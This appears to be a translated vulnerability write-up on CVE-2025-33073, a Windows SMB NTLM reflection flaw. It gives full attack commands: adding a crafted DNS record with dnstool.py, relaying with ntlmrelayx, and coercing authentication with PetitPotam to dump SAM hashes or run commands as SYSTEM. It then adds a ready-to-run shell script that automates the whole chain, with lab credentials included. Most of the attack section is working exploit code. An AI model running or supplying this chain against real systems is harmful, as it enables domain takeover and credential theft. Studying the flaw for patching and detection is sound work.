0x00 Preface
Windows is the graphical operating system developed by Microsoft. It ships in desktop, server and (formerly) phone editions and is one of the most widely deployed operating systems in the world.
SMB (Server Message Block) is Microsoft's network file-sharing protocol. It lets applications on a computer read and write files and request services from server programs across the network.
0x01 Vulnerability description
CVE-2025-33073 is an NTLM reflection vulnerability in the Windows SMB client. An attacker holding any domain account adds a DNS record whose name is the victim's computer name followed by a marshaled CREDENTIAL_TARGET_INFORMATION suffix (1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA in this write-up), points it at an attacker-controlled host, and coerces the victim into authenticating to that name (for example with PetitPotam). LSASS strips the marshaled suffix before NTLM processing, so the victim's NTLM client treats the target as the local machine; when the attacker relays the resulting authentication straight back to the victim's own SMB service, it is accepted as a local authentication and the attacker obtains command execution as SYSTEM. Hosts that enforce SMB signing are not exploitable, because the relayed session cannot sign; the June 2025 security update fixes the underlying LSASS behaviour. The Synacktiv write-up in the references covers the internals.
0x02 CVE ID
CVE-2025-33073
0x03 Affected versions
Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)
Windows Server 2008 R2 for x64-based Systems Service Pack 1
Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for x64-based Systems Service Pack 2
Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)
Windows Server 2008 for 32-bit Systems Service Pack 2
Windows Server 2016 (Server Core installation)
Windows Server 2016
Windows 10 Version 1607 for x64-based Systems
Windows 10 Version 1607 for 32-bit Systems
Windows Server 2012 R2 (Server Core installation)
Windows Server 2012 R2
Windows Server 2012 (Server Core installation)
Windows Server 2012
Windows 10 for x64-based Systems
Windows 10 for 32-bit Systems
Windows Server 2025
Windows 11 Version 24H2 for x64-based Systems
Windows 11 Version 24H2 for ARM64-based Systems
Windows Server 2022, 23H2 Edition (Server Core installation)
Windows 11 Version 23H2 for x64-based Systems
Windows 11 Version 23H2 for ARM64-based Systems
Windows Server 2025 (Server Core installation)
Windows 10 Version 22H2 for 32-bit Systems
Windows 10 Version 22H2 for ARM64-based Systems
Windows 10 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for x64-based Systems
Windows 11 Version 22H2 for ARM64-based Systems
Windows 10 Version 21H2 for x64-based Systems
Windows 10 Version 21H2 for ARM64-based Systems
Windows 10 Version 21H2 for 32-bit Systems
Windows Server 2022 (Server Core installation)
Windows Server 2022
Windows Server 2019 (Server Core installation)
Windows Server 2019
Windows 10 Version 1809 for x64-based Systems
Windows 10 Version 1809 for 32-bit Systems
0x04 Exploitation requirements
1. The attacker holds an ordinary domain account.
2. SMB signing is not enforced on the target host.
3. The domain's DNS records can be modified (for example with dnstool.py; by default any authenticated user may add records to an AD-integrated DNS zone).
0x05 Reproduction
1. Lab setup
Attacker: 192.168.2.5 (Kali Linux)
Victim, a domain-joined workstation: 192.168.2.3 (Windows 10, computer name win10pc)
DC: 192.168.2.1 (Windows Server 2012)
Ordinary domain user: test.com\test1
Password: Test..111
2. Steps
(1) Add a DNS record on the domain controller
Use dnstool.py to add a DNS record on the domain controller that points the crafted name at the attacker host.
Download the toolkit:
https://github.com/dirkjanm/krbrelayx
and use the dnstool.py it contains.
Command:
python dnstool.py -u 'test.com\test1' -p 'Test..111' -r win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA -d 192.168.2.5 --action add 192.168.2.1
Note:
The record name win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA is the victim's computer name (win10pc) followed by 1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA; localhost1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA can be used instead. The suffix must be appended unchanged, and because a DNS label is limited to 63 characters the computer-name part has to be short enough for the whole name to fit.
The new record is then visible on the domain controller (DNS Manager).
(2) Start the listener
Kali Linux ships impacket-ntlmrelayx. The relay target is the victim itself; relaying back to the coerced host is what makes this a reflection rather than an ordinary NTLM relay.
Command:
impacket-ntlmrelayx -t 192.168.2.3 -smb2support
(3) Coerce NTLM authentication
Tool download:
https://github.com/topotam/PetitPotam
Command:
python PetitPotam.py -d test.com -u test1 -p Test..111 win10pc1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA 192.168.2.3
Watch the relay window; if nothing arrives, run the coercion command a few more times. Once 192.168.2.3 authenticates to the crafted name and the authentication is relayed back to it, ntlmrelayx (with no further options) dumps the local SAM hashes of 192.168.2.3.
With -c <command> added to the listener command, the command is instead executed on 192.168.2.3 as SYSTEM and its output is returned.
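The requirements in 0x04 and the three steps above, wrapped into one script as an added example (this is not code from the write-up, krbrelayx, PetitPotam or impacket). It builds the crafted DNS label from the victim's computer name and checks the 63-character label limit, refuses to run unless the relay target is the coerced host itself, and checks the SMB signing requirement with a NetExec (nxc) banner, which is an assumption of this example rather than a tool the page uses. The checkout paths in KRBRELAYX_DIR and PETITPOTAM_DIR are likewise assumptions; the lab addresses and credentials are the ones from the write-up.

```sh
#!/bin/sh
# Added example, not part of the original write-up: the reproduction
# steps wrapped in one script, with the crafted DNS name built from the
# victim's computer name and the prerequisites checked first.
# Assumptions not stated on the page: dnstool.py is in a krbrelayx
# checkout at $KRBRELAYX_DIR, PetitPotam.py in a checkout at
# $PETITPOTAM_DIR, impacket-ntlmrelayx and nxc (NetExec) are on PATH.
# Tools are only invoked when RUN_ATTACK=1, so the helpers run offline.
set -eu

# Marshaled target-information suffix from the write-up, appended
# unchanged to the victim's computer name.
MARSHALED_SUFFIX='1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAwbEAYBAAAA'

# Lab values from the write-up; override through the environment.
ATTACKER_IP="${ATTACKER_IP:-192.168.2.5}"
VICTIM_IP="${VICTIM_IP:-192.168.2.3}"
VICTIM_HOST="${VICTIM_HOST:-win10pc}"
DC_IP="${DC_IP:-192.168.2.1}"
DOMAIN="${DOMAIN:-test.com}"
DOM_USER="${DOM_USER:-test1}"
DOM_PASS="${DOM_PASS:-Test..111}"
KRBRELAYX_DIR="${KRBRELAYX_DIR:-./krbrelayx}"
PETITPOTAM_DIR="${PETITPOTAM_DIR:-./PetitPotam}"
RELAY_TARGET="${RELAY_TARGET:-$VICTIM_IP}"   # where ntlmrelayx relays to
COERCE_TARGET="${COERCE_TARGET:-$VICTIM_IP}" # host PetitPotam coerces
RELAY_ARGS="${RELAY_ARGS:-}"   # e.g. "-c whoami" instead of the SAM dump
RELAY_WAIT="${RELAY_WAIT:-30}" # seconds to leave the relay running

# Crafted label <computer name><suffix>. A DNS label is limited to 63
# characters, so overlong names fail here rather than inside dnstool.py.
reflect_name() {
    name="$1$MARSHALED_SUFFIX"
    if [ "${#name}" -gt 63 ]; then
        echo "reflect_name: label too long (${#name} > 63)" >&2
        return 1
    fi
    printf '%s\n' "$name"
}

# Reflection only works if the coerced host and the relay target are the
# same machine; an ordinary relay to a third host is a different attack.
check_reflection_target() {
    [ "$1" = "$2" ]
}

# Parse one nxc "smb" banner line such as
#   SMB  192.168.2.3  445  WIN10PC  [*] Windows 10 ... (signing:False) ...
# Returns 0 when signing is enforced, i.e. the host is not exploitable.
signing_enforced() {
    case "$1" in
        *"(signing:True)"*) return 0 ;;
        *) return 1 ;;
    esac
}

preflight() {
    if ! check_reflection_target "$COERCE_TARGET" "$RELAY_TARGET"; then
        echo "relay target must be the coerced host itself" >&2
        return 1
    fi
    banner="$(nxc smb "$VICTIM_IP" | grep -F '(signing:' || true)"
    if signing_enforced "$banner"; then
        echo "SMB signing is enforced on $VICTIM_IP; not exploitable" >&2
        return 1
    fi
}

add_dns_record() {
    python "$KRBRELAYX_DIR/dnstool.py" -u "$DOMAIN\\$DOM_USER" -p "$DOM_PASS" \
        -r "$(reflect_name "$VICTIM_HOST")" -d "$ATTACKER_IP" \
        --action add "$DC_IP"
}

start_relay() {
    # shellcheck disable=SC2086  # RELAY_ARGS is meant to be word-split
    impacket-ntlmrelayx -t "$RELAY_TARGET" -smb2support $RELAY_ARGS &
    RELAY_PID=$!
    sleep 3   # let the listener bind port 445 before coercing
}

coerce_auth() {
    python "$PETITPOTAM_DIR/PetitPotam.py" -d "$DOMAIN" -u "$DOM_USER" \
        -p "$DOM_PASS" "$(reflect_name "$VICTIM_HOST")" "$COERCE_TARGET"
}

main() {
    preflight
    add_dns_record
    start_relay
    # The write-up notes that coercion sometimes needs several attempts.
    for _ in 1 2 3; do
        coerce_auth || true
        sleep 5
    done
    sleep "$RELAY_WAIT"          # relay output (SAM dump or command result)
    kill "$RELAY_PID" 2>/dev/null || true
}

if [ "${RUN_ATTACK:-0}" = "1" ]; then
    main
fi
```

Run it as RUN_ATTACK=1 VICTIM_HOST=win10pc sh reflect.sh; set RELAY_ARGS='-c whoami' to have ntlmrelayx execute a command instead of dumping the SAM. The relay is killed after RELAY_WAIT seconds, so raise that value if the dump has not finished; without RUN_ATTACK the file can be sourced and only the helper functions are defined.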
0x06 References
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025
https://github.com/dirkjanm/krbrelayx
https://github.com/topotam/PetitPotam